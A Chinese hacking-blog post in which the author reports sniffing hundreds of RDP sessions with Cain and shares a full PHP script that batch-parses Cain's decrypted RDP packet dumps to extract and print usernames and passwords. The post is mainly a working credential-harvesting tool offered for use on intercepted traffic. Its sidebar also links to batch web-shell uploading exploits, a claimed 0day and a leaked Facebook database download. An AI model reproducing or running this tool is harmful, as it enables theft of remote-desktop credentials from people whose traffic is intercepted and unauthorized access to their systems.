关注我们
QRcode 邮件联系 QRcode
主页 » 资源共享 » 正文

Cain嗅探的RDP包批量解析脚本导出用户名+密码

 feng  1,780 ℃  0条点评

昨天晚上开始嗅探,好家伙好几百个包,网上搜了一下有一款工具叫“Cain RDP Parser”,好家伙,一个一个选,玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。

CainRdpParser.png

 

 

  1. <?php
  2. //Author Wdot
  3. //Site:http://wdot.cc
  4. //用法 php CainRdpParser.php /tmp/1.txt #单个文件解析
  5. //用法 php CainRdpParser.php /tmp/RDP/ #批量解析
  6. error_reporting(E_ERROR);
  7. if(is_dir($argv[1]))
  8. {
  9. foreach (scandir($argv[1]) as $key => $value) {
  10. if($value!='.' && $value!='..')
  11. {
  12. rdpParser($argv[1].$value);
  13. }
  14. }
  15. }elseif(is_file($argv[1]))
  16. {
  17. rdpParser($argv[1]);
  18. }
  19. function rdpParser($filename){
  20. $crlf = "\r\n";
  21. if(!file_exists($filename)){
  22. print "file \"$filename\" not exists...$crlf";
  23. return;
  24. }
  25. $rdpH=fopen($filename,'r');
  26. print "FILE:".basename($filename).$crlf;
  27. fseek($rdpH,0);
  28. while (!feof($rdpH)) {
  29. $line=trim(fgets($rdpH));
  30. if(preg_match("/\w+.address:.*?$/",$line,$m))
  31. {
  32. print $line.$crlf;
  33. }
  34. if(preg_match("/^\[Client decrypted packet\]/",$line,$m))
  35. {
  36. $packet='';
  37. while (!empty($line)) {
  38. $line=trim(fgets($rdpH));
  39. $packet.=substr($line,5,48);
  40. }
  41. $packets=explode('0000000000',str_replace(' ', '', $packet));
  42. $i=count($packets)-27;
  43. $packets=explode('0000',$packets[$i]);
  44. $times=0;
  45. foreach ($packets as $key => $value) {
  46. if(empty($value) || $times>=2)continue;
  47. print (($times==0)?'username':'password').":\t".pack('H*',$value).$crlf;
  48. $times++;
  49. }
  50. break;
  51. }
  52. }
  53. fclose($rdpH);
  54. print "-------------------------------$crlf";
  55. }
  56. ?>

作者:wdot.cc

本文标签:
任意文件上传漏洞可批量拿shell
最新0day蚂蚁信息分类系统漏洞
黑客游戏Watch Dogs PC版正式发布下载地址黑客游戏Watch Dogs PC版正式发布下载地址百度网盘35G(两年)+10G(永久)免费扩容百度网盘35G(两年)+10G(永久)免费扩容社交网站Facebook数据库下载 2.8G社交网站Facebook数据库下载 2.8G教你用107.6元开16个月年费黄钻教你用107.6元开16个月年费黄钻

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码